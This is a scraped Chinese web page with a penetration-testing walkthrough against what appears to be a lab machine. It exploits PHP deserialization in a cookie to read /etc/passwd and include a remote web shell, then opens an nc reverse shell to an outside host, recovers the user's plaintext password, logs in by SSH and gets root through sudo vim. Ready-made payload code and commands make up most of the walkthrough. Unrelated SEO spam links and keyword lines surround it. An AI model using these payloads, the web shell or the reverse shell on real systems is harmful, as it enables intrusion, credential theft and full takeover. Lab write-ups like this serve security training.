当前位置: 首页 > news >正文

网站建设修改教程视频教程图片wordpress

网站建设修改教程视频教程,图片wordpress,网站跳转至手机端如何做,网站的需求分析包括哪些kali靶机配置 【我图片里没有截图的默认配置即可】需要改的地方图片里面都有。 使用kali扫描网关的主机。 扫到一个开放了80端口HTTP协议的主机ip 访问80端口 会看到一个文本页面,翻译一下看是什么意思。。 F12查看cookie,是一个base64编码了的东西 使…

kali靶机配置

【我图片里没有截图的默认配置即可】需要改的地方图片里面都有。

使用kali扫描网关的主机。

扫到一个开放了80端口HTTP协议的主机ip

访问80端口

会看到一个文本页面,翻译一下看是什么意思。。

F12查看cookie,是一个base64编码了的东西

使用burpsuite解码功能解码,发现是一个代码

解码前:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0=

解码后:

0:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";0:7:"Welcome":0:{}}

使用webshell工具扫描目录 

右键将地址添加,扫描后查看到两个目录文件 ,访问一下。。

访问后会看到弹出一个文件下载界面。

进行代码审计


1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

构造查看文件的payload

将下列的代码保存到自己的www目录下新建成一个php文件

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

访问自己构造的payload

也就是访问自己建的payload.php。

查看到了base64编码后的payload。

抓包查看,将user=改为自己构造下的payload

可以看到查到了etc/passwd文件,可以看见sk4用户

再将自己编码后的payload解码

O:4:"User":2:{s:10:"Username";s:5:"admin";s:9:"Userwel";O:3:"Log":1:{s:13:"Logtype_log";s:11:"/etc/passwd";}}
<?phpclass Log {private $type_log = "http://172.16.1.65/3.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

构造连接cmd的payload

新建一个3.txt里面内容如下:

<?php @system($ GET['cmd']);?>

将之前自己www目录下的php文件内容改为如下(地址为自己的本机地址):

将页面显示得到的复制到burpsuite中

结果显示如下

在如图所示的地方写入?cmd=id,显示如下:

添加反弹shell

在?cmd后面添加如下:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.1.65+4444+>/tmp/f

没有反应,但是反弹shell成功。

重新抓包,将抓到的数据包该为自己改成的数据包,放包。

显示如下连接靶机成功:,,,,后续可以进行cmd命令操作靶机。

继续使用cmd命令查看靶机用户的账号密码

用户名sk4 ,密码是:KywZmnPWW6tTbW5w

进行远程连接

ssh sk4@192.168.189.157

输入你查到的密码。。。

sudo vim

提权

提权到了root用户

http://www.yayakq.cn/news/308455/

相关文章:

  • 做介绍美食网站的菜单的一级a做爰片免费网站孕交视频
  • 购物网站搜索功能怎么做湖南长沙门户网站
  • wordpress漫画采集seo包括网站建设吗
  • 学网站建设难查找全国免费网站建设
  • 定制v教程免费移动端关键词排名如何优化
  • win 2003 网站 管理员24什么网站建设
  • 网站建设公司营销推广凡科网站怎么做
  • jsp 网站连接数据库沈阳网站建设搜q479185700
  • 电商网站怎么做seo优化汶上网站建设哪家便宜
  • 网站建设的产品类型是什么logo制作app
  • 哪个网站可兼职做logo山西通州集团网站建设
  • 响应式网站有什么区别新手学做网站电子版
  • 网页建站软件哪个网站可以做app界面
  • 安康网站建设智能小程序废物利用手工制作图片
  • 网站开发的风险与风险管理wordpress 评论 重复
  • 2018做网站还赚钱吗做网站需学什么条件
  • 郑州建设工程协会网站湖北网站建设免费
  • 成都学校网站制作如何开发自己的app
  • 云南网站定制开发什么网站可以发布广告
  • nas 建网站网站推广平台代理
  • 建设网站有哪些好处和坏处中小公司做网站
  • 学做美食视频网站有哪些西宁网站建设费用
  • 合肥网红打卡地洛阳做网站优化
  • 百度云网站建设教程视频教程网络广告的特点有哪些?
  • 黄金网站app软件下载安装免费网页传奇服务端
  • 沈阳网站建设哪里的公司比较好如何进行企业营销型网站建设
  • 怎样给自己做网站无锡 网站 seo 优化
  • wordpress 请选择一个文件夹seo服务加盟
  • 贵州省建设厅省外企业官方网站win7优化教程
  • 什么网站可以做护考题广西建网站